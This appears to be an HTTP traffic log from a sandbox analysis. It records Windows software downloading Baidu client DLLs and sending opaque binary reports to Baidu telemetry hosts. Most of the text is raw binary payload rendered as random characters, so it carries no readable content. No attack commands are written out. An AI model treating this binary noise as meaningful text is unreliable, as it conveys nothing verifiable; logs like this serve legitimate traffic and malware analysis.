x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>4.T...4...DNx?.6.C:.V4nB...F.(.'.n.....@9.. [email protected].|..[..<br>.\;..^r.......w....e.d..Q_.r$....V..k.......P1X..32Vy........M.....4.y<br>.....K...H1.....C..>..:[}O..x.6.......|.AM.S..5$U...5....sO...k.3. <br>.z.. Zd*)c.$...#o...Y...%..yM0'.M......2M...x.3....._V......:......)R.<br>.U*;r.......,Y.......C.....&.~[......2M.....X.....=.!_.....I3$..^..(..<br>m.P..$.61...}.~....*}....>.e.$P..2.........#.e.H....~GNs.E....._...<br>...o.?~.4...t7...|.R.............p.!...:.P.......M....t.G .3.6A......8<br>.Y9...........O6.....Z...O......@=e.....|^.e.8...-.F....5Z'^q..2.._y..<br>...D..G..:a`&...........V.H...6'..K4d.0.......i<dW#|....0..A.j..n.$<br>.%3..|.1......H..F`.."..FN.&.f&........*.4........t.nQ.Yv\.Q.'.y.;....<br>...J..]DG.HDT.K<.X...........n8.(....TWB=".....oq.!&...............<br>PNI~s..o..w....%[email protected]<.&F[h..<br>.L.{...LV.||.Y........o\.Ze.......Cr.h..kq.I..6..#..........q.w.y.. ..<br> .........m..B..2.!z.....w...R.^.O'.,f..N..y...sl.6w-Q...ad..|........<br>.b...=.w...W...C.|...] ..s..b.UQHr<qM..K.8*`.$T.B.......}b........W<br>Z..wS............./.i..^....}.............r..Y.ue!.... ../..].a-.)..:.<br>......[....6LA.C....h...1.6.....*.-..S....Wq. ..R....*.G(o.....9.B...:<br>-.|F.dIc.u...M. >@..8t.I...)-..p.C).7nh=}s...t7...{S.......).B. ...<br>.....30 M..D....P.F..D...K.]<...h..U..<l;....\..M.&i...J$A7...3.<br>...e..(%....l.&.&...Y%.{B.gf....p..ER.h).....-.....j......aN.x..w....n<br>..\..e...iQ;.:..Ds..=...(j...2..'#E.[...KR.......;..q....a1.)ZYgTO.:..<br>[email protected]'..Z..X.D)J.-....L......^........;.....\.-h4^_y.</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=983040-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>

Date: Mon, 28 Jul 2014 23:18:00 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 983040-1178447/1178448<br>

Content-Length: 195408<br>

Age: 1652554<br>

Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>".......................................`...".......$.................<br>..................................".......P...........................<br>.... .......*...".......................................`.......j...".<br>.................................................."...................<br>................................................".......(.............<br>..................................$...".......l.......................<br>........x.......P.......Z.......d.......n...........................".<br>.........................................................."...........<br>................................".......H.............................<br>..0...".......t...............................j.......`..."...........<br>....................................................6.................<br>......"...........................................".......,...........<br>................................".......X.............................<br>.. ...".......................................`.......j..."...........<br>....................................................O]................<br>......"...................................................".......D...<br>........................................".......x.....................<br>..........0.......:...".......................................`.......<br>j..."...........................................".....................<br>..............................".......@...............................<br>............"[email protected]...".....<br>..................................p.......x..."...................</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/common/patch/19035267599/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=1146880-<br>

Referer: hXXp://xf.baidu.com<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:32 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 60640<br>

Connection: close<br>

ETag: 30cbc602ada7cdfb0346038c05996d84<br>

Last-Modified: Wed, 30 Apr 2014 05:22:28 GMT<br>

Expires: Mon, 18 Aug 2014 14:59:38 GMT<br>

Age: 127254<br>

Content-Range: bytes 1146880-1207519/1207520<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DC8389F18378C004A7004B30F60323AD<br>

x-bs-request-id: MTAuNTcuMTIyLjM1OjgwODA6MjM1OTEyNDY2MzoyOC9KdWwvMjAxNCAyMjo1OTowNiA=<br>

x-bs-meta-crc32: 2965621797<br>

Content-MD5: 30cbc602ada7cdfb0346038c05996d84<br>

x-bs-client-ip: MTgwLjc2LjIyLjE3Mg==<br><pre>......................................................................<br>......................................................................<br>..........................................abcdefghijklmnopqrstuvwxyz..<br>....ABCDEFGHIJKLMNOPQRSTUVWXYZ........................................<br>......................................................................<br>......................................................................<br>......................................................                <br>          .....................</pre></font><br><br

<font color="red">POST / HTTP/1.1<br>

Connection: Keep-Alive<br>

Content-Length: 68<br>

Content-Type: application/octet-stream<br>

Host: s.x.baidu.com<br>

Keep-Alive: timeout=600,max=1000<br>

<br>

...8........" 228f74ad8138cf3f6e758ac75971083b([email protected].` ......</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: iYuntianSvr<br>

Content-Type: application/octet-stream<br>

Keep-Alive: timeout=30<br>

Connection: Keep-Alive<br>

Content-Length: 124<br><pre>...p........" 228f74ad8138cf3f6e758ac75971083b(.28.G.k...v $(F.Cj...:.<br>...59......\....3V.%..5..2.c..`[email protected].` ........</pre></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=20578304-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:03 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 5426000<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127224<br>

Content-Range: bytes 20578304-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>6.d.[."...ik....;..XE.$..l-0.....34..%;..}y.....[.0V..X......*<.b..<br>.E..J....i..c.... .......4.&..O.b...[j`.9..D..?.... .5..;....\..h.K.\P<br>9.f..6.....-......md/7d`...J..J..=..:.G:.........cq.E~...(.r.....N.V..<br>pW#@n..s@ ....@.'.y....8.<?JT.N8........H........1..k..2..` .U*....<br>/..&,M.MH4.J.C....:C."tO^A;."......[q.e.._[lf............F....f...b0L.<br>5D.d]..q..d...>i..y?....<2k.Y..r.A....V..|R..r`s.@:..:.. F..]QK.<br>u...C(.#q..7gi.*.:$L..."~..B......D.b..tt.{q5xl...b:.....l......J....W<br>_,.*1%....."=..wd9..`6....6.._.y(.w......:.W.b_.MP...c.L..~.).)LOM...f<br>[email protected]..`....6....^9`...O...o. ...........J....!|2...y_..:..l.<br>@oHq.@D.:^[email protected].,c....9..b|...N.....5>.|.e.j ......'~.<br>.....l.=.z.;.....!..........F/......[d.................lO.EK.L....@r..<br>........t..9...&g.\^[.E..P.......R.....><S..>.".=.E.y^.......<br>k.q.h. ..R.b.?w/......Z..../..Ck....p..g.|}.sL..L=P.F...8...&x....$a&i<br>.7..4......Dg.!x..{.dNr....T.1m.a._......E*........U........E..I.....=<br>].A.?... .......[............qyG"0S.@[email protected]..!.K..;!.[[email protected]...<br>HdI?..r.....Fu.'..bI....b.,..k<...A..Z6'.pG....s....i....0^.....5..<br>e2..^..\.@.\...S[_yq.U.2K...Wo|.....u8g.Z......2>....$...:4..s...a.<br>b...._.......7".\{...o..8.6VP.....3........../C...u.R....-.J....]..f.t<br>`.g..i.....Q.......W..5e..V>.:.....W....w....g.w..1...~.m.e.B U]."M<br>.r.U...R...!.t.XQ4..L.....DPf...c..;...Q.!..hW.....]....6.h.l..[?...Q.<br>....X.No4.kaG..B)..(.mcqJZ...H......_....s.&D...B>.^..N).Y.4....n.l<br>O.AIJ.1.`....R..:......)..*.[.E.......Nn.....\E....R.5r/..K.h.wyI8</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 200 OK<br>

Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>

Date: Mon, 28 Jul 2014 23:18:00 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Content-Length: 1178448<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Age: 1652553<br>

Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$........>.^._...<br>_..._..._..._...P..._..T...._......._......._......y_......._......._.<br>......_......._..Rich._..........PE..L....>ES...........!..........<br>......W................................................{..............<br>....................-...............................P...........@9....<br>..............................@.......................................<br>.....text...;........................... ..`.rdata..-.................<br>..........@[email protected][email protected]............<br>[email protected]...............................@[email protected]<br>...3.......@[email protected]....................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..................................................................</pre><<< skipped >>></font><br><br

<font color="red">POST / HTTP/1.1<br>

Connection: Keep-Alive<br>

Content-Length: 77<br>

Content-Type: application/octet-stream<br>

Host: p.x.baidu.com<br>

Keep-Alive: timeout=600,max=1000<br>

<br>

...A........." 228f74ad8138cf3f6e758ac75971083b([email protected].` ......</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: iYuntianSvr<br>

Content-Type: application/octet-stream<br>

Keep-Alive: timeout=30<br>

Connection: Keep-Alive<br>

Content-Length: 133<br><pre>...y........." 228f74ad8138cf3f6e758ac75971083b(.........28.YxY..b`...<br>Ty..O..8T..6&...l.. ..l.......&.{[email protected].` ......</font><br>....</pre></font><br><br><font color="red">POST / HTTP/1.1<br>

Connection: Keep-Alive<br>

Content-Length: 157<br>

Content-Type: application/octet-stream<br>

Host: p.x.baidu.com<br>

Keep-Alive: timeout=600,max=1000<br>

<br>

...y........." 228f74ad8138cf3f6e758ac75971083b(.........28.YxY..b`...Ty..O..8T..6&...l.. ..l.......&.{[email protected].` ......t&......E.P...`.`k}.....</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: iYuntianSvr<br>

Content-Type: application/octet-stream<br>

Keep-Alive: timeout=30<br>

Connection: Keep-Alive<br>

Content-Length: 941<br><pre>...y........." 228f74ad8138cf3f6e758ac75971083b(.........28.YxY..b`...<br>Ty..O..8T..6&...l.. ..l.......&.{[email protected].` ...(...1}....<br>[email protected].[8..!..R~p|...k...H...;.g...i..E........<br>.y.~o.Fj...(...~z......h>.V.].$w..J...tN5....s........k..0/..<./<br>.%......wflP.........}.c.9.9../\."/......t..D.9.iX.3M.9..@E[}Kw.7....G<br>S......y...x..].4,.......W._.?....3f)...v D.y;.......c._!9...Q.&..l...<br>.zQ....b.c.s-q.....a ..w.T...O.M7[Xj'{G.......1cm;........,-..8@\...7.<br>.nXr?8.z..%j...=/.Z[..u.z......\U.[R..........57.9...0.$....A.!.3..T..<br>..J=..T.y...)F...O.....{....#3}...\..[.T6......< ...&,..6:....{j..1<br>.....N..4.G..qM...Pm..Q.C.......D...]wP.'s..zq!..{....O,@h2...."...T.d<br>....G[..).,..F.5...<.}.yA...-S........@p..<*W.a5u..<B_.1f*...<br>[email protected](...................=......*/.d..;...atDe.7.[..9...Y.$.P<br>K`..G..S..U....Tp...:...J..DG.r...F.\S...fz)..1..2....'.]....u........<br>........AT.;.*......T\......2...=)....A......z.....</pre></font><br><br

<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=950272-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 15:52:24 GMT<br>

Date: Sun, 10 Aug 2014 15:52:24 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 950272-1178447/1178448<br>

Content-Length: 228176<br>

Age: 556091<br>

Via: 1.0 sdytwt89:8104 (Cdn Cache Server V2.0), 1.0 tswt88:8080 (Cdn Cache Server V2.0), 1.0 jg11:51020 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre></pre></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=23199744-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:25 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 2804560<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127246<br>

Content-Range: bytes 23199744-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>o...Sp.&l.................J..g...K.[.}L.R<.........B1.?.....v.S...2<br>y..).RI...,..q....\..Iu..2.....z..0.j../Fz.....e.h$...i..2.........K.:<br>....\|..'!. ....._)To....~...I...R...D..".5Z....u.Vn`.....}N.|...DU..k<br>u.L...-.].<.C.......3.^.`K..]....I._V.n.s...#m.m}..B.B...4........Q<br>fBT.M"..M.....N.._._........$.....V.J..;......c..O.!......<.....3..<br>.(?"...f.E@....'.....N.l.q.H.a5..I.<........u......b"|....c.....m..<br>i.x.....(Is..|.....Q...jVk<..,.?...c.N.wq.>rKj.H...$^)W.O....R..<br>9.L.......x.Vj.e.T.,,F...M\h....`...l.......f.HTTP/1.1 206 Partial Con<br>tent..Server: JSP3/2.0.0-b..Date: Sun, 17 Aug 2014 02:21:25 GMT..Conte<br>nt-Type: application/x-msdownload..Content-Length: 2804560..Connection<br>: close..ETag: c7062e404128917808756500d58121ee..Last-Modified: Fri, 1<br>1 Jul 2014 14:29:11 GMT..Expires: Mon, 18 Aug 2014 15:00:39 GMT..Age: <br>127246..Content-Range: bytes 23199744-26004303/26004304..Access-Contro<br>l-Allow-Origin: *..Access-Control-Allow-Methods: HEAD, GET, OPTIONS, P<br>UT, POST, DELETE..Access-Control-Expose-Headers: Content-Length, ETag,<br> x-bs-request-id, x-pcs-request-id..Access-Control-Allow-Headers: Rang<br>e, Origin, Content-Type, Accept, Content-Length..Accept-Ranges: bytes.<br>.x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF..x-bs-request-id: MTAu<br>NDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=..x-bs<br>-meta-crc32: 2839405489..Content-MD5: c7062e404128917808756500d58121ee<br>..x-bs-client-ip: MTgwLjc2LjIyLjc5..o...Sp.&l.................J..g...K<br>.[.}L.R<.........B1.?.....v.S...2y..).RI...,..q....\..Iu..2....</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=851968-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 15:52:41 GMT<br>

Date: Sun, 10 Aug 2014 15:52:41 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 851968-1207519/1207520<br>

Content-Length: 355552<br>

Age: 556070<br>

Via: 1.0 sdytwt85:88 (Cdn Cache Server V2.0), 1.0 tswt79:80 (Cdn Cache Server V2.0), 1.0 shiben14:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMReport.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>....t)[email protected]"[email protected]......#.;.u..E.....]..E.....tO.E.@.<br>].uF.E......#.=...@......=......G...;.u".E.;.v........................<br>..............`..........D.$..2M....0...........`..........D.$.M......<br>........8]...u!.E..t..............`.......D.... .}........#.;........E<br>.........u....a..S.u..E.j.P.u.......W.u...d`.............t`..P..;.....<br>..........`.......D... ..6..1..Y.....j.SS.6................SSS.6.....#<br>.............j..E.P.6..'.................tg..........}.....uU.E.......<br>.E.;.........................j.SS.6..........tySSS.6........#......_..<br>..<....E.%....=....u..6.....Y..:..j.^.0.......=....u.Sj..6.J.......<br>.........E.......SS.6.,..........E.3.Ht.H.......E......E........E.....<br>.E......E. .P.D=.P.6.(.........t...9}.........6.....Y..9.....E....6...<br>.....`.............._^[..j.hh=....j...M..3..u.3.9u....;.u...9........V<br>[email protected]...........}.;.t<<br>;.\9...8..3.9u.t 9u.t..E.....M..........`....D... ..u..)1..Y..E...j...<br>j.h.=...2j..3..u.3..}.;....;.u...8..j._.8VVVVV...........Y...3.9u....;<br>.t.9u.t..E.%[email protected].<br>;.t......i...3..}.9u.t(9u.t.................`....D... ..7.T0..Y.U..Q.M<br>..j..E.P.u..u..u..u...........t.......E...U..j..u..u..u..u..u.........<br>].U.....SVW3.j.SS.u..]..]..;....E.#........U.tYj.SS.u........#.......t<br>A.u..}. ...........;............Sj....a..P...a.....E.u...7.........w7.<br>..._^[..h.....u......YY.E...|...;.r.......P.u..u..0.........t6. ...x..<br>...w..u..u..u......YY.u.j....a..P...a..3........7...8.u...6.......</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=22413312-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:20 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 3590992<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127241<br>

Content-Range: bytes 22413312-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>..g.6...kz..L..^T........`J#\. .e.M#[email protected]@........2!(\. (..2y0. .<br>...4..9.<f....A..*........F..!...w.....n...../..J....;.l.......0.A.<br>W......B..~.P...y1..-.w^...TDZf..ji<...N....jX....8p....#..../u....<br>..m.9...S..G%aha`.>...i.3...l=.O.x.=;.h..6b....).s..u.n[.`......T.t<br>.............k.P....u.G}..w..R....JV....tg<....3.*.j..|...."..z....<br>..i5H...3....w.......).5........*"0P/..Ucs.A. _Z.......u'..d....}.R..6<br>(............}"..%b,.;.B..FM.....Ya.. ....4.._..v..\.>.....9V....?.<br>...?HY...i..W2...L...T....b.^..?6..0..{j..M....T.[..w.L...4.FT.r..r./ <br>.........oJ.t.........1.W^...........h.=%.S..{%....6.........p{.U....Y<br>..'j....4.7.i.".....R..|.uI...az.w8...!/.........Y.j.W.u..=.*.#S...y.t<br>. ...|s0...0..V...Q..t? 5.^...i............S9...|...v ../.N...........<br>.....%E.*6.i.8..J=rj.&.....s..G.w.......R.............l.Hk..Q..Ip.B...<br>.<..<I...2..DG..........[..#....Ie|.U#Igm.}...K...u.n.....,\....<br>-.../....1R......,8.dG..k.S[a=m..u.PY..%................C;h(......a5..<br>..............r...$}..I./.8FROV..........NU.H%..&..Yx..0......{...><br>F.i!Y.......0.......b..\W.=.r.Md..I..Q8....WY...]....O.o1....P.t.....#<br>.29..__>.....-S.F.....n.8_.!G ......i.$!%.%.X../b:|=K."1..G....~.u.<br>........a.W...2....P&......x,0.....7.T.G..(..9t.as`P....h...@).....6..<br>.V.^x.N.)...6.....q...*.h%....;.w.JD.....!{T.../.'.9=........6 ..v.t.t<br>.Z..x.ta.Q.!........H.F-...3.);.m6F}w..w;.[...y..........&.'....d..X%.<br>.P....B....g3A0..w...<-~..........Y .f..1....6......d..`.;[4....k..<br>....d..C....\./1...[..*...w.4.gD..I..."}...,..V"7.........B...Pz.9</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=19529728-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:41 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 6474576<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127202<br>

Content-Range: bytes 19529728-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>p.....',..HF.d.q.L9.]...kz.....I.Wt:t(...X..*..2U[..%|.Nh.l..l"E.x...2<br>q.?*)(0.i..b@'N...Uey...UQ.S..4....8e.1.r.\XZ...$..6....rM......0o...)<br>.q...%....3...5...K.q0Fb.JTi.",Q...=.._..Z.....Z.F......RP7.....6...]9<br>...C.|..@......\{2'[email protected]..<....q..5\R..c..,.]L......<br>.f....Qh3`.d..#.V.j.5.0ei..;........ ...,.., <.Z....h....;...6N..,.<br>.ES..9....DTW...g/,.7M..O.Z/q".2s.y...w$.9.2w.....o.Z}..`....0.....Fb.<br>E...d.......:q.a._?..j....A.o....3.{G.....NY.....,X3W..hl... .$}.q....<br>.....J....'- ...O/.........8...P..q....H=l.Z......J....,...Y....`.r...<br>.hzjn....gkA.g............yX....h0.L..:q...,NS...Xp.h...2..h..zMo.'I..<br>....K.WI..hA...j-0..A.{E][email protected]..(......Y.$. ..<br>...... y.C;.N./p.Q.=R.....l...N9s.....U.B....Y.q.".i.F.n.....e..Pu%X..<br>.?..*]..~..udl..P.G.{..2.<Q...e...M.......z.^7..J........]..../....<br>..<.g.Y.;o.7.N...!.."L0..9.B...7.yF6.}.j...;....nw...R..?.D.OL.....<br>.......D....|..U.I<E_.K......L.z...KswDsC'.~..m..lwj.w.....G....Z`.<br>.(6.p.......yb.KC.6j........`..Z....*Z.8.Gn,/H.v|...L N..B...-..m:x}.u<br>.=.e. .m..`&g4......42..w.,.....6.h../.;:..9}...O..{6G.......Z..f.c...<br>e.3C....:....l.#-t..5z_......,.m3N,H..Am...rdO.....J.....cFk..M..p..s.<br>]....../..n.%....m...U...Z......-....5...-....s....]{.....pE3.AFd`...@<br>....l3$.....6$..L......]....`It......=...Z...$.6......ZFi.,....$^....k<br>...a.Bry.:,~....G.9k.V.D...yD.[._]d. ...5...x.j..../3..q..'..`.KO4F...<br>....h...P..~...s.z!.\R..%...o. .m5.*...|&....t..Gs.............p......<br>%=}kp..P.5.. K..I......8*.. ........`..H..D..*..B.HJ...6.....{5.3.</pre><<< skipped >>></font><br><br

